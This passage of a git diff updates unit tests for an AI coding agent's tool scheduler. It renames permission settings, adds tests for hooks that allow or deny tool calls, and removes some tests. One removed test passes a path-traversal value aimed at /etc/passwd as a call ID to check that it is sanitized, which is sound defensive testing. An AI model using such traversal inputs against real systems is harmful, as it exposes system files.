getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -375,8 +387,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests - getExcludeTools: () => undefined, + getPermissionsDeny: () => undefined, isInteractive: () => true, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -416,8 +430,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, - getExcludeTools: () => ['write_file', 'edit', 'run_shell_command'], + getPermissionsDeny: () => ['write_file', 'edit', 'run_shell_command'], isInteractive: () => false, // Value doesn't matter, but included for completeness + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -446,8 +462,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, - getExcludeTools: () => ['write_file', 'edit'], + getPermissionsDeny: () => ['write_file', 'edit'], isInteractive: () => false, // Value doesn't matter + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -487,8 +505,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, - getExcludeTools: () => undefined, + getPermissionsDeny: () => undefined, isInteractive: () => true, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -547,8 +567,8 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], - getExcludeTools: () => ['write_file', 'edit', 'run_shell_command'], + getPermissionsAllow: () => [], + getPermissionsDeny: () => ['write_file', 'edit', 'run_shell_command'], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -567,6 +587,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -633,8 +655,8 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], - getExcludeTools: () => ['write_file', 'edit'], // Different excluded tools + getPermissionsAllow: () => [], + getPermissionsDeny: () => ['write_file', 'edit'], // Different excluded tools getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -653,6 +675,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -723,7 +747,7 @@ describe('CoreToolScheduler with payload', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -745,6 +769,8 @@ describe('CoreToolScheduler with payload', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -998,9 +1024,13 @@ class MockEditToolInvocation extends BaseToolInvocation< return 'A mock edit tool invocation'; } - override async shouldConfirmExecute( + override async getDefaultPermission(): Promise { + return 'ask'; + } + + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { + ): Promise { return { type: 'edit', title: 'Confirm Edit', @@ -1062,7 +1092,7 @@ describe('CoreToolScheduler edit cancellation', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1081,6 +1111,8 @@ describe('CoreToolScheduler edit cancellation', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1140,7 +1172,8 @@ describe('CoreToolScheduler YOLO mode', () => { const mockTool = new MockTool({ name: 'mockTool', execute: executeFn, - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + getDefaultPermission: MOCK_TOOL_GET_DEFAULT_PERMISSION, + getConfirmationDetails: MOCK_TOOL_GET_CONFIRMATION_DETAILS, }); const declarativeTool = mockTool; @@ -1168,7 +1201,7 @@ describe('CoreToolScheduler YOLO mode', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1187,6 +1220,8 @@ describe('CoreToolScheduler YOLO mode', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1328,6 +1363,8 @@ describe('CoreToolScheduler cancellation during executing with live output', () terminalHeight: 30, }), getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1409,7 +1446,7 @@ describe('CoreToolScheduler request queueing', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, // Use YOLO to avoid confirmation prompts - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1428,6 +1465,8 @@ describe('CoreToolScheduler request queueing', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1503,118 +1542,6 @@ describe('CoreToolScheduler request queueing', () => { expect(onAllToolCallsComplete.mock.calls[1][0][0].status).toBe('success'); }); - it('should auto-approve a tool call if it is on the allowedTools list', async () => { - // Arrange - const executeFn = vi.fn().mockResolvedValue({ - llmContent: 'Tool executed', - returnDisplay: 'Tool executed', - }); - const mockTool = new MockTool({ - name: 'mockTool', - execute: executeFn, - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, - }); - const declarativeTool = mockTool; - - const toolRegistry = { - getTool: () => declarativeTool, - getToolByName: () => declarativeTool, - getFunctionDeclarations: () => [], - tools: new Map(), - discovery: {}, - registerTool: () => {}, - getToolByDisplayName: () => declarativeTool, - getTools: () => [], - discoverTools: async () => {}, - getAllTools: () => [], - getToolsByServer: () => [], - } as unknown as ToolRegistry; - - const onAllToolCallsComplete = vi.fn(); - const onToolCallsUpdate = vi.fn(); - - // Configure the scheduler to auto-approve the specific tool call. - const mockConfig = { - getSessionId: () => 'test-session-id', - getUsageStatisticsEnabled: () => true, - getDebugMode: () => false, - getApprovalMode: () => ApprovalMode.DEFAULT, // Not YOLO mode - getAllowedTools: () => ['mockTool'], // Auto-approve this tool - getToolRegistry: () => toolRegistry, - getContentGeneratorConfig: () => ({ - model: 'test-model', - authType: 'gemini', - }), - getShellExecutionConfig: () => ({ - terminalWidth: 80, - terminalHeight: 24, - }), - getTerminalWidth: vi.fn(() => 80), - getTerminalHeight: vi.fn(() => 24), - storage: { - getProjectTempDir: () => '/tmp', - }, - getTruncateToolOutputThreshold: () => - DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD, - getTruncateToolOutputLines: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES, - getUseModelRouter: () => false, - getGeminiClient: () => null, // No client needed for these tests - getChatRecordingService: () => undefined, - } as unknown as Config; - - const scheduler = new CoreToolScheduler({ - config: mockConfig, - onAllToolCallsComplete, - onToolCallsUpdate, - getPreferredEditor: () => 'vscode', - onEditorClose: vi.fn(), - }); - - const abortController = new AbortController(); - const request = { - callId: '1', - name: 'mockTool', - args: { param: 'value' }, - isClientInitiated: false, - prompt_id: 'prompt-auto-approved', - }; - - // Act - await scheduler.schedule([request], abortController.signal); - - // Wait for the tool execution to complete - await vi.waitFor(() => { - expect(onAllToolCallsComplete).toHaveBeenCalled(); - }); - - // Assert - // 1. The tool's execute method was called directly. - expect(executeFn).toHaveBeenCalledWith({ param: 'value' }); - - // 2. The tool call status never entered 'awaiting_approval'. - const statusUpdates = onToolCallsUpdate.mock.calls - .map((call) => (call[0][0] as ToolCall)?.status) - .filter(Boolean); - expect(statusUpdates).not.toContain('awaiting_approval'); - expect(statusUpdates).toEqual([ - 'validating', - 'scheduled', - 'executing', - 'success', - ]); - - // 3. The final callback indicates the tool call was successful. - expect(onAllToolCallsComplete).toHaveBeenCalled(); - const completedCalls = onAllToolCallsComplete.mock - .calls[0][0] as ToolCall[]; - expect(completedCalls).toHaveLength(1); - const completedCall = completedCalls[0]; - expect(completedCall.status).toBe('success'); - if (completedCall.status === 'success') { - expect(completedCall.response.resultDisplay).toBe('Tool executed'); - } - }); - it('should handle two synchronous calls to schedule', async () => { const executeFn = vi.fn().mockResolvedValue({ llmContent: 'Tool executed', @@ -1643,7 +1570,7 @@ describe('CoreToolScheduler request queueing', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1662,6 +1589,8 @@ describe('CoreToolScheduler request queueing', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1717,7 +1646,7 @@ describe('CoreToolScheduler request queueing', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => approvalMode, - getAllowedTools: () => [], + getPermissionsAllow: () => [], setApprovalMode: (mode: ApprovalMode) => { approvalMode = mode; }, @@ -1737,6 +1666,8 @@ describe('CoreToolScheduler request queueing', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const testTool = new TestApprovalTool(mockConfig); @@ -1879,8 +1810,8 @@ describe('CoreToolScheduler truncated output protection', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.AUTO_EDIT, - getAllowedTools: () => [], - getExcludeTools: () => undefined, + getPermissionsAllow: () => [], + getPermissionsDeny: () => undefined, getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1900,6 +1831,8 @@ describe('CoreToolScheduler truncated output protection', () => { getGeminiClient: () => null, getChatRecordingService: () => undefined, isInteractive: () => true, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -2078,7 +2011,7 @@ describe('CoreToolScheduler Sequential Execution', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, // Use YOLO to avoid confirmation prompts - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -2097,6 +2030,8 @@ describe('CoreToolScheduler Sequential Execution', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -2198,7 +2133,7 @@ describe('CoreToolScheduler Sequential Execution', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -2217,6 +2152,8 @@ describe('CoreToolScheduler Sequential Execution', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -2290,227 +2227,6 @@ describe('CoreToolScheduler Sequential Execution', () => { }); }); -describe('truncateAndSaveToFile', () => { - const mockWriteFile = vi.mocked(fs.writeFile); - const THRESHOLD = 40_000; - const TRUNCATE_LINES = 1000; - - beforeEach(() => { - vi.clearAllMocks(); - }); - - it('should return content unchanged if below threshold', async () => { - const content = 'Short content'; - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result).toEqual({ content }); - expect(mockWriteFile).not.toHaveBeenCalled(); - }); - - it('should truncate content by lines when content has many lines', async () => { - // Create content that exceeds 100,000 character threshold with many lines - const lines = Array(2000).fill('x'.repeat(100)); // 100 chars per line * 2000 lines = 200,000 chars - const content = lines.join('\n'); - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - mockWriteFile.mockResolvedValue(undefined); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.outputFile).toBe( - path.join(projectTempDir, `${callId}.output`), - ); - expect(mockWriteFile).toHaveBeenCalledWith( - path.join(projectTempDir, `${callId}.output`), - content, - ); - - // Should contain the first and last lines with 1/5 head and 4/5 tail - const head = Math.floor(TRUNCATE_LINES / 5); - const beginning = lines.slice(0, head); - const end = lines.slice(-(TRUNCATE_LINES - head)); - const expectedTruncated = - beginning.join('\n') + '\n... [CONTENT TRUNCATED] ...\n' + end.join('\n'); - - expect(result.content).toContain( - 'Tool output was too large and has been truncated', - ); - expect(result.content).toContain('Truncated part of the output:'); - expect(result.content).toContain(expectedTruncated); - }); - - it('should wrap and truncate content when content has few but long lines', async () => { - const content = 'a'.repeat(200_000); // A single very long line - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - const wrapWidth = 120; - - mockWriteFile.mockResolvedValue(undefined); - - // Manually wrap the content to generate the expected file content - const wrappedLines: string[] = []; - for (let i = 0; i < content.length; i += wrapWidth) { - wrappedLines.push(content.substring(i, i + wrapWidth)); - } - const expectedFileContent = wrappedLines.join('\n'); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.outputFile).toBe( - path.join(projectTempDir, `${callId}.output`), - ); - // Check that the file was written with the wrapped content - expect(mockWriteFile).toHaveBeenCalledWith( - path.join(projectTempDir, `${callId}.output`), - expectedFileContent, - ); - - // Should contain the first and last lines with 1/5 head and 4/5 tail of the wrapped content - const head = Math.floor(TRUNCATE_LINES / 5); - const beginning = wrappedLines.slice(0, head); - const end = wrappedLines.slice(-(TRUNCATE_LINES - head)); - const expectedTruncated = - beginning.join('\n') + '\n... [CONTENT TRUNCATED] ...\n' + end.join('\n'); - expect(result.content).toContain( - 'Tool output was too large and has been truncated', - ); - expect(result.content).toContain('Truncated part of the output:'); - expect(result.content).toContain(expectedTruncated); - }); - - it('should handle file write errors gracefully', async () => { - const content = 'a'.repeat(2_000_000); - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - mockWriteFile.mockRejectedValue(new Error('File write failed')); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.outputFile).toBeUndefined(); - expect(result.content).toContain( - '[Note: Could not save full output to file]', - ); - expect(mockWriteFile).toHaveBeenCalled(); - }); - - it('should save to correct file path with call ID', async () => { - const content = 'a'.repeat(200_000); - const callId = 'unique-call-123'; - const projectTempDir = '/custom/temp/dir'; - const wrapWidth = 120; - - mockWriteFile.mockResolvedValue(undefined); - - // Manually wrap the content to generate the expected file content - const wrappedLines: string[] = []; - for (let i = 0; i < content.length; i += wrapWidth) { - wrappedLines.push(content.substring(i, i + wrapWidth)); - } - const expectedFileContent = wrappedLines.join('\n'); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - const expectedPath = path.join(projectTempDir, `${callId}.output`); - expect(result.outputFile).toBe(expectedPath); - expect(mockWriteFile).toHaveBeenCalledWith( - expectedPath, - expectedFileContent, - ); - }); - - it('should include helpful instructions in truncated message', async () => { - const content = 'a'.repeat(2_000_000); - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - mockWriteFile.mockResolvedValue(undefined); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.content).toContain( - 'Tool output was too large and has been truncated', - ); - expect(result.content).toContain('The full output has been saved to:'); - expect(result.content).toContain( - 'To read the complete output, use the read_file tool with the absolute file path above', - ); - expect(result.content).toContain( - 'The truncated output below shows the beginning and end of the content', - ); - }); - - it('should sanitize callId to prevent path traversal', async () => { - const content = 'a'.repeat(200_000); - const callId = '../../../../../etc/passwd'; - const projectTempDir = '/tmp/safe_dir'; - const wrapWidth = 120; - - mockWriteFile.mockResolvedValue(undefined); - - // Manually wrap the content to generate the expected file content - const wrappedLines: string[] = []; - for (let i = 0; i < content.length; i += wrapWidth) { - wrappedLines.push(content.substring(i, i + wrapWidth)); - } - const expectedFileContent = wrappedLines.join('\n'); - - await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - const expectedPath = path.join(projectTempDir, 'passwd.output'); - expect(mockWriteFile).toHaveBeenCalledWith( - expectedPath, - expectedFileContent, - ); - }); -}); - describe('CoreToolScheduler plan mode with ask_user_question', () => { function createAskUserQuestionMockTool() { let wasAnswered = false; @@ -2518,7 +2234,8 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { return new MockTool({ name: 'ask_user_question', - shouldConfirmExecute: async () => ({ + getDefaultPermission: async () => 'ask', + getConfirmationDetails: async () => ({ type: 'ask_user_question' as const, title: 'Please answer the following question(s):', questions: [ @@ -2589,7 +2306,7 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.PLAN, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -2611,6 +2328,8 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; return new CoreToolScheduler({ @@ -2725,7 +2444,8 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { it('should block non-ask_user_question tools that need confirmation in plan mode', async () => { const editTool = new MockTool({ name: 'write_file', - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + getDefaultPermission: MOCK_TOOL_GET_DEFAULT_PERMISSION, + getConfirmationDetails: MOCK_TOOL_GET_CONFIRMATION_DETAILS, }); const onAllToolCallsComplete = vi.fn(); const onToolCallsUpdate = vi.fn(); @@ -2812,3 +2532,626 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { expect(completedCalls[0].status).toBe('cancelled'); }); }); + +// Integration tests for the fire* functions +describe('Fire hook functions integration', () => { + let mockMessageBus: { request: ReturnType }; + + beforeEach(() => { + mockMessageBus = { + request: vi.fn(), + }; + }); + + describe('firePreToolUseHook', () => { + it('should allow tool execution when hook permits', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: 'allow', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePreToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(true); + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PreToolUse', + input: { + permission_mode: 'full', + tool_name: 'testTool', + tool_input: { param: 'value' }, + tool_use_id: 'toolu_test', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should block tool execution when hook denies', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: 'deny', + reason: 'Not allowed', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePreToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(false); + expect(result.blockReason).toBe('Not allowed'); + }); + + it('should return shouldProceed: true when no message bus is provided', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + const result = await firePreToolUseHook( + undefined, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(true); + }); + + it('should return shouldProceed: true when hook request fails', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + mockMessageBus.request.mockRejectedValue(new Error('Network error')); + + const result = await firePreToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(true); + }); + }); + + describe('firePostToolUseHook', () => { + it('should return shouldStop: false when hook permits', async () => { + const { firePostToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + permission_decision: 'proceed', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePostToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + { response: 'result' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldStop).toBe(false); + }); + + it('should return shouldStop: true when hook indicates stop', async () => { + const { firePostToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: 'allow', + continue: false, + stopReason: 'Completed', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePostToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + { response: 'result' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldStop).toBe(true); + expect(result.stopReason).toBe('Completed'); + }); + + it('should return shouldStop: false when no message bus is provided', async () => { + const { firePostToolUseHook } = await import('./toolHookTriggers.js'); + + const result = await firePostToolUseHook( + undefined, + 'testTool', + { param: 'value' }, + { response: 'result' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldStop).toBe(false); + }); + }); + + describe('firePostToolUseFailureHook', () => { + it('should return additional context when hook provides it', async () => { + const { firePostToolUseFailureHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + additionalContext: 'Additional error context', + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePostToolUseFailureHook( + mockMessageBus as unknown as MessageBus, + 'toolu_test', + 'testTool', + { param: 'value' }, + 'Error occurred', + false, + 'full', + ); + + expect(result.additionalContext).toBe('Additional error context'); + }); + + it('should return empty object when no message bus is provided', async () => { + const { firePostToolUseFailureHook } = await import( + './toolHookTriggers.js' + ); + + const result = await firePostToolUseFailureHook( + undefined, + 'toolu_test', + 'testTool', + { param: 'value' }, + 'Error occurred', + false, + 'full', + ); + + expect(result).toEqual({}); + }); + }); + + describe('fireNotificationHook', () => { + it('should send notification to message bus', async () => { + const { fireNotificationHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + additionalContext: 'Notification processed', + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await fireNotificationHook( + mockMessageBus as unknown as MessageBus, + 'Test message', + 'info' as NotificationType, + 'Test Title', + ); + + expect(result.additionalContext).toBe('Notification processed'); + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Test message', + notification_type: 'info', + title: 'Test Title', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should return empty object when no message bus is provided', async () => { + const { fireNotificationHook } = await import('./toolHookTriggers.js'); + + const result = await fireNotificationHook( + undefined, + 'Test message', + 'info' as NotificationType, + 'Test Title', + ); + + expect(result).toEqual({}); + }); + }); + + describe('firePermissionRequestHook', () => { + it('should return hasDecision: false when hook makes no decision', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: null, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePermissionRequestHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(false); + }); + + it('should return hasDecision: true with allow decision when hook allows', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + decision: { + behavior: 'allow', + updatedInput: { param: 'modified_value' }, + }, + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePermissionRequestHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(true); + expect(result.shouldAllow).toBe(true); + expect(result.updatedInput).toEqual({ param: 'modified_value' }); + }); + + it('should return hasDecision: true with deny decision when hook denies', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + decision: { + behavior: 'deny', + message: 'Access denied', + interrupt: true, + }, + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePermissionRequestHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(true); + expect(result.shouldAllow).toBe(false); + expect(result.denyMessage).toBe('Access denied'); + expect(result.shouldInterrupt).toBe(true); + }); + + it('should return hasDecision: false when no message bus is provided', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const result = await firePermissionRequestHook( + undefined, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(false); + }); + }); + + describe('Concurrent task tool execution', () => { + function createScheduler( + tools: Map, + onAllToolCallsComplete: Mock, + onToolCallsUpdate: Mock, + ) { + const mockToolRegistry = { + getTool: (name: string) => tools.get(name), + getFunctionDeclarations: () => [], + tools, + discovery: {}, + registerTool: () => {}, + getToolByName: (name: string) => tools.get(name), + getToolByDisplayName: () => undefined, + getTools: () => [...tools.values()], + discoverTools: async () => {}, + getAllTools: () => [...tools.values()], + getToolsByServer: () => [], + } as unknown as ToolRegistry; + + const mockConfig = { + getSessionId: () => 'test-session-id', + getUsageStatisticsEnabled: () => true, + getDebugMode: () => false, + getApprovalMode: () => ApprovalMode.AUTO_EDIT, + getAllowedTools: () => [], + getContentGeneratorConfig: () => ({ + model: 'test-model', + authType: 'gemini', + }), + getShellExecutionConfig: () => ({ + terminalWidth: 90, + terminalHeight: 30, + }), + storage: { + getProjectTempDir: () => '/tmp', + }, + getTruncateToolOutputThreshold: () => + DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD, + getTruncateToolOutputLines: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES, + getToolRegistry: () => mockToolRegistry, + getUseModelRouter: () => false, + getGeminiClient: () => null, + getChatRecordingService: () => undefined, + getMessageBus: 